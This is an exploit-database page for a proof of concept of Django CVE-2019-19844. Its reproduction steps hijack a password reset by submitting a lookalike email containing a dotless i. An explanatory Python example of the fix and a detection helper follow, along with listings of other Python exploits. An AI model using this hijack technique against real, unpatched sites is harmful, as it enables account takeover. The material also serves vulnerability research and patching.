Author
"Ryuji Tsutsui"
Platform
python
Release date
2019-12-24
EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip

# django_cve_2019_19844_poc

PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)

# Requirements

- Python 3.7.x
- PostgreSQL 9.5 or higher

## Setup

1. Create database (e.g. `django_cve_2019_19844_poc`)
1. Set the database name to the environment variable `DJANGO_DATABASE_NAME` (e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
1. Create the following user with `shell` command:

    ```python
    >>> from django.contrib.auth import get_user_model
    >>> User = get_user_model()
    >>> User.objects.create_user('mike123', '[email protected]', 'test123')
    ```

## Procedure For Reproducing

1. Run `./manage.py runserver`
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
1. Input `mı[email protected]` (Attacker's email), and click send button
1. Receive email (Check console), and reset password
1. Login as `mike123` user
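Why the reproduction steps above succeed on an unpatched install, and what the fixed Django releases do differently, shown as an added example (not code from the PoC repository or from Django itself). The account, the `example.org` addresses and the helper names are constructed for illustration, and `db_iexact` is a hypothetical stand-in for the database's case-insensitive match.

```python
import unicodedata

# Constructed sample data (assumption, not from the PoC): one stored account.
USERS = {"mike123": "mike@example.org"}


def db_iexact(stored, submitted):
    """Stand-in for a case-insensitive DB lookup that upper-cases both sides.
    U+0131 (dotless i) upper-cases to 'I', the same as ASCII 'i'."""
    return stored.upper() == submitted.upper()


def unicode_ci_compare(s1, s2):
    """Stricter comparison of the kind the fix adds: NFKC-normalise, then casefold.
    U+0131 casefolds to itself, so it no longer equals ASCII 'i'."""
    return (unicodedata.normalize("NFKC", s1).casefold()
            == unicodedata.normalize("NFKC", s2).casefold())


def recipients_before_fix(submitted):
    """Vulnerable behaviour: the reset mail goes to the address typed in the form."""
    return [submitted for stored in USERS.values() if db_iexact(stored, submitted)]


def recipients_after_fix(submitted):
    """Hardened behaviour: re-check the DB hit in Python and mail only the
    address stored on the account, never the submitted string."""
    return [stored for stored in USERS.values()
            if db_iexact(stored, submitted) and unicode_ci_compare(stored, submitted)]


def is_suspicious(submitted):
    """Detection aid: the request matches an account only through a lossy
    case mapping, which is worth logging as a possible hijack attempt."""
    return any(db_iexact(stored, submitted) and not unicode_ci_compare(stored, submitted)
               for stored in USERS.values())


if __name__ == "__main__":
    lookalike = "m\u0131ke@example.org"  # constructed address with dotless i
    print("before fix:", recipients_before_fix(lookalike))
    print("after fix: ", recipients_after_fix(lookalike))
    print("flagged:   ", is_suspicious(lookalike))
```

Running `is_suspicious` over logged password-reset submissions is one way to look for past attempts on an install that was exposed before upgrading.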
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-10-23 | "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" | webapps | python | "Ahmet Ümit BAYRAM" |
2020-10-16 | "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" | webapps | python | "Ünsal Furkan Harani" |
2020-08-04 | "Pi-hole 4.3.2 - Remote Code Execution (Authenticated)" | webapps | python | "Luis Vacacas" |
2019-12-24 | "Django < 3.0 < 2.2 < 1.11 - Account Hijack" | webapps | python | "Ryuji Tsutsui" |
2019-10-14 | "Ajenti 2.1.31 - Remote Code Execution" | webapps | python | "Jeremy Brown" |
2019-09-30 | "TheSystem 1.0 - Command Injection" | webapps | python | "Sadik Cetin" |
2019-09-30 | "thesystem 1.0 - Cross-Site Scripting" | webapps | python | "Anıl Baran Yelken" |
2019-04-03 | "PhreeBooks ERP 5.2.3 - Remote Command Execution" | remote | python | "Metin Yunus Kandemir" |
2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
2019-01-07 | "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" | remote | python | "Mehmet Ince" |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-12-24 | "Django < 3.0 < 2.2 < 1.11 - Account Hijack" | webapps | python | "Ryuji Tsutsui" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47879/?format=json')